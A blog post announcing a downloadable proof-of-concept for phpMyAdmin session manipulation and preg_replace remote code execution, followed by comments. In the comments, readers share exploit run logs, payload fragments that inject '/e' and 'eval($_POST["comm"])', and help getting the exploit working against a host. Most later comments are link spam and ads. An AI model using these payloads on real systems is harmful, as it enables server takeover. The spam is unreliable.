I'm flooded with requests for a POC and many doubt that these vulnerabilities are exploitable. And since this vulnerability is rather technically interesting I believe many could learn from it.
The POC uses the session manipulation vulnerability in combination with the remote code execution in preg_replace as detailed in my last blogpost. It will only confirm if the instance is exploitable or not and you need to have valid credentials to the database. Use responsibly.
Download here
Edit:As 0x6a616d6573 reminded me of, blogger removes "%00" if not carefully encoded. The code posted where messed up due to this. (The downloadable file where still fine)
Now it's fixed. I also added the "//" as suggested.
Subscribe to:
Post Comments (Atom)
It doesn't Work It show me
ReplyDelete[i] Running...
[*] Contacting server to authenticate.
[i] Cookie:pma_mcrypt_iv=6usxi8fDjxY%3D; phpMyAdmin=83f941377c2ad368cb065ae3511c114b6ce908d7; pmaUser-1=K6%2BMQV0L8oo%3D; pmaPass-1=C7ohzD7vwAc%3D
[i] Token:e498413730bbb8c51ce127b807160bf8
[*] Contacting server to poison some _SESSION variables.
[*] Contacting server to execute command.
[!] Authentication error. Wrong password maby.
[*] Exiting...
I use PMA V 3.4.3 PHP 5.3.5 On OSX
@Anonymous
ReplyDeleteI'll debug tomorrow. It would be helpfull if you edited the code and changed $debug to true and emailed me the output to h@xxor.se
@Mango: I appreciate the PoC, and I did learn something. I learned I should have spent more time trying to exploit this bug. lol :] Nice work!
ReplyDeleteAlso, to get the PoC working reliably, I simply added a uri encoded null byte at the end of the regex string, and a comment delimiter at the end of the injected PHP code (The null is not needed there BTW):
'&_SESSION[src_uncommon_tables][0]=||/e'.
Becomes
'&_SESSION[src_uncommon_tables][0]=||/e'.
And
'\`.eval($_POST["comm"]);'."\x00" :
Becomes
'\`.eval($_POST["comm"]);//'."\x00" :
Great Article
DeleteCyber Security Projects for CSE Students
JavaScript Training in Chennai
Project Centers in Chennai
JavaScript Training in Chennai
Apparently blogger eats url encoded nulls for breakfast, but I think you know what I mean from the description.
ReplyDeleteJust tested with version 3.3.9.2 (Unsuccessful) and Tried 0x6a616d6573's ['\`.eval($_POST["comm"]);//'."\x00" :]
ReplyDeleteResult of execution:
[i] Running...
[*] Contacting server to authenticate.
[!] Fail. request returned 401. The host is not vulnerable or there is a problem with the supplied url.
[*] Exiting...
-------------
Being that -u is set to https
@Anon: Try echo'ing out the $result variable to see if that can give you some insight into how the 401 error is happening. Also, the null at the end of the php code isn't necessary. I don't know if that's the problem, but give it a go, and let us know how it works?
ReplyDelete@Mango: Have you looked into the possibility of authentication bypass since $_SESSION variables can apparently be overwritten? I realize the authentication within phpMyAdmin happens on two different layers, (Application, and SQL) but bypassing phpMyAdmin application specific authentication should suffice for a preauth remote code execution condition. What do you think?
@0x6a616d6573
ReplyDeleteAs I remember, the authentication can be bypassed without modifying the session. But I came to the conclusion that the code inevitably comes to some place where it needs a valid connection to the database before it hits any funny pieces of code.
But please, if you can find something, tell me. =D
Last Anon.
ReplyDeleteDebug = 1
http://www.pastie.org/private/66hsny5mrc8xw27dgsuitw
@Anonymous
ReplyDeleteYour server uses basic authentication. Use an url like this:
https://user:pass@db.xxxxxxxxxx.com:443/phpmyadmin
I don't know if these credentials are the same as your db credentials.
Can u show me LFI Bug PoC
ReplyDeletegreat work man!
ReplyDeleteit took me a while to fully understand all this, but now it's clear!:)
Congrats for the hard work!
Download link does not work anymore :-(
ReplyDeletehttps://www.facebook.com/bantalsilikongrosir
ReplyDeletehttp://bantalsilikon01.blogspot.com/2014/12/a.html
http://jualsangkarpleci.blogspot.com/2014/12/a.html
http://kopiluwakliar01.blogspot.com/2014/12/a.html
http://vvty.in/uncategorized/marinir-seo/
http://marinirseo.blogspot.com/2014/12/a.html
http://marinir-seo.blogspot.com/2014/12/a.html
http://bumbu-pecel-malang.blogspot.com/2014/12/a.html
http://distro-seo.blogspot.com/2014/12/a.html
http://restoran-seo.blogspot.com/2014/12/a.html
http://bantalmalangmurah.blogspot.com/2014/12/a.html
http://distrobantal.blogspot.com/2014/12/a.html
http://kesethandukmalang.blogspot.com/2014/12/a.html
http://tasya.marinirseo.web.id/?p=4http://jeannet.marinirseo.web.id/?p=4http://anne.marinirseo.web.id/?p=4http://jelita.marinirseo.web.id/?p=4http://ruth.marinirseo.web.id/?p=4http://caca.marinirseo.web.id/?p=4http://brenda.marinirseo.web.id/?p=1 || http://tasya1.marinirseo.web.id/?p=4http://jeannet1.marinirseo.web.id/?p=4http://anne1.marinirseo.web.id/?p=4http://jelita1.marinirseo.web.id/?p=4http://ruth1.marinirseo.web.id/?p=4http://caca1.marinirseo.web.id/?p=5http://brenda1.marinirseo.web.id/?p=4 || http://tasya2.marinirseo.web.id/?p=5http://jeannet2.marinirseo.web.id/?p=4http://anne2.marinirseo.web.id/?p=4http://jelita2.marinirseo.web.id/?p=4http://ruth2.marinirseo.web.id/?p=4http://caca2.marinirseo.web.id/?p=4http://brenda2.marinirseo.web.id/?p=4http://brenda3.marinirseo.web.id/?p=4http://tasya3.marinirseo.web.id/dua/http://jeannet3.marinirseo.web.id/?p=4http://anne3.marinirseo.web.id/?p=4http://jelita3.marinirseo.web.id/?p=4http://ruth3.marinirseo.web.id/?p=4http://caca3.marinirseo.web.id/?p=4 || nhttp://brenda4.marinirseo.web.id/?p=4http://tasya4.marinirseo.web.id/?p=4http://jeannet4.marinirseo.web.id/?p=4http://anne4.marinirseo.web.id/?p=4http://jelita4.marinirseo.web.id/?p=5http://ruth4.marinirseo.web.id/?p=4http://caca4.marinirseo.web.id/?p=4 || http://tasya5.marinirseo.web.id/?p=4http://anne5.marinirseo.web.id/?p=4http://jelita5.marinirseo.web.id/?p=4http://ruth5.marinirseo.web.id/?p=4http://caca5.marinirseo.web.id/?p=4http://synganne.marinirseo.web.id/?p=4
http://tasya.marinirseo.web.id/?p=4http://jeannet.marinirseo.web.id/?p=4http://anne.marinirseo.web.id/?p=4http://jelita.marinirseo.web.id/?p=4http://ruth.marinirseo.web.id/?p=4http://caca.marinirseo.web.id/?p=4http://brenda.marinirseo.web.id/?p=1 || http://tasya1.marinirseo.web.id/?p=4http://jeannet1.marinirseo.web.id/?p=4http://anne1.marinirseo.web.id/?p=4http://jelita1.marinirseo.web.id/?p=4http://ruth1.marinirseo.web.id/?p=4http://caca1.marinirseo.web.id/?p=5http://brenda1.marinirseo.web.id/?p=4 || http://tasya2.marinirseo.web.id/?p=5http://jeannet2.marinirseo.web.id/?p=4http://anne2.marinirseo.web.id/?p=4http://jelita2.marinirseo.web.id/?p=4http://ruth2.marinirseo.web.id/?p=4http://caca2.marinirseo.web.id/?p=4http://brenda2.marinirseo.web.id/?p=4http://brenda3.marinirseo.web.id/?p=4http://tasya3.marinirseo.web.id/dua/http://jeannet3.marinirseo.web.id/?p=4http://anne3.marinirseo.web.id/?p=4http://jelita3.marinirseo.web.id/?p=4http://ruth3.marinirseo.web.id/?p=4http://caca3.marinirseo.web.id/?p=4 || nhttp://brenda4.marinirseo.web.id/?p=4http://tasya4.marinirseo.web.id/?p=4http://jeannet4.marinirseo.web.id/?p=4http://anne4.marinirseo.web.id/?p=4http://jelita4.marinirseo.web.id/?p=5http://ruth4.marinirseo.web.id/?p=4http://caca4.marinirseo.web.id/?p=4 || http://tasya5.marinirseo.web.id/?p=4http://anne5.marinirseo.web.id/?p=4http://jelita5.marinirseo.web.id/?p=4http://ruth5.marinirseo.web.id/?p=4http://caca5.marinirseo.web.id/?p=4http://synganne.marinirseo.web.id/?p=4
I enjoy, result in I found exactly what I used to be looking for. You’ve ended my 4 day long hunt! God Bless you man. Have a nice day. Bye
ReplyDeleteRegards too from Young Entrepreneur
Tangki Fiberglass
Jual Septic Tank
why It doesn't Work? can help me
ReplyDeletefree hamachi alternative http://www.techfreetricks.com/top-5-hamachi-alternatives-virtual-lan-gaming/ Hamachi has been around for a long time now and is the most favored decision of numerous gamers over the globe. That being stated, Hamachi comes with its own particular downsides. free hamachi alternative
ReplyDeleteI will always support your website, hopefully more advanced. keep the spirit… thanks
ReplyDeleteThese training concentrate on the technologies and skills required to be a data scientist like Machine learning, SAS, Tableau, Python, R and many more. data science course syllabus
ReplyDeleteAivivu vé máy bay giá rẻ
ReplyDeletevé máy bay giá rẻ tết 2021
kinh nghiệm mua vé máy bay đi Mỹ giá rẻ
bay từ Việt Nam sang Pháp mất bao lâu
thời gian bay từ việt nam sang hàn quốc
săn vé máy bay đi nhật giá rẻ
mua vé máy bay đi Anh
Wow what a Great Information about World Day its exceptionally pleasant educational post. a debt of gratitude is in order for the post.
ReplyDeletedata science course in India
This is a wonderful article, Given so much info in it, Thanks for sharing. CodeGnan offers courses in new technologies and makes sure students understand the flow of work from each and every perspective in a Real-Time environment Augmented reality course in vijayawada. ,
ReplyDeleteBandar poker Terpercaya
ReplyDeleteBandar poker Terpercaya
Bandar poker Terpercaya
Bandar poker Terpercaya
Bandar poker Terpercaya
Bandar poker Terpercaya
Dewacintaqq
Dewacintaqq.com
Dewa cintaqq
Poker Online
Domino 99
BandarQ
link alternatif Dewacintaqq
Daftar Dewacintaqq
Bandar poker Terpercaya
dewacintaqq
dewacintaqq.com
dewa cintaqq
Cinta
daftar dewacintaqq
link alternatif dewacintaqq
Bandar poker Terpercaya
Bandar poker Terpercaya
SITUS TOGEL ONLINE
Situs Togel Hongkong
Situs Togel Singapore
Bandar poker terpercaya
Daftar Dominohalo
Bandar poker terpercaya
Daftar twinpoker88
Bandar poker terpercaya
Daftar Delimapoker
Bandar poker terpercaya
Daftar Papadomino
DewacintaQQ
link alternatif Dewacintaqq
Deposit
Deposit dewacintaqq
Poker Indonesia
Poker Online Indonesia
Bandar QQ
Agen Ceme Online
Daftar Situs Poker
Poker Online Terpercaya
Judi Poker
Poker Online Uang Asli
Poker Uang Asli
Situs Poker Online
Agen Poker
Poker88
Capsa Susun Online
daftar idn poker
idnpoker
bigceme
ceme
ceme online
bandar ceme
idn poker
Idnplay
idn play
poker
poker idn
agen poker online
poker online
situs poker online
judi online
situs judi online
Are you also searching for spanish nursing writing services we are the best solution for you. We are best known for delivering the best services to students.
ReplyDeletecool blog, cool post, very interesting, it would be cool if a large number of people have to find out, and it will help to increase coverage in social networks https://soclikes.com/
ReplyDeleteAivivu chuyên vé máy bay, tham khảo
ReplyDeletevé máy bay đi Mỹ Vietnam Airline
đăng ký bay từ mỹ về việt nam
vé máy bay đi Los Angeles bao nhiêu tiền
ve may bay tu canada ve viet nam
Your blogs are great.Are you also searching for Pico assignment? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.
ReplyDeleteI love this. It is soo informative. Are you also searching for Swedish assignment writing help we are the best solution for you. We are best known for delivering the best services to students without having to break the bank
ReplyDeleteYour blogs are great.Are you also searching for Nursing Writing Services? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.
ReplyDeleteYour blogs are great.Are you also searching for Nursing Writing Help? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.
ReplyDeleteGood blog.Are you also searching for Help With My Nursing Paper? we are the best solution for you. We are best known for delivering nursing writing services to students without having to break the bank.
ReplyDelete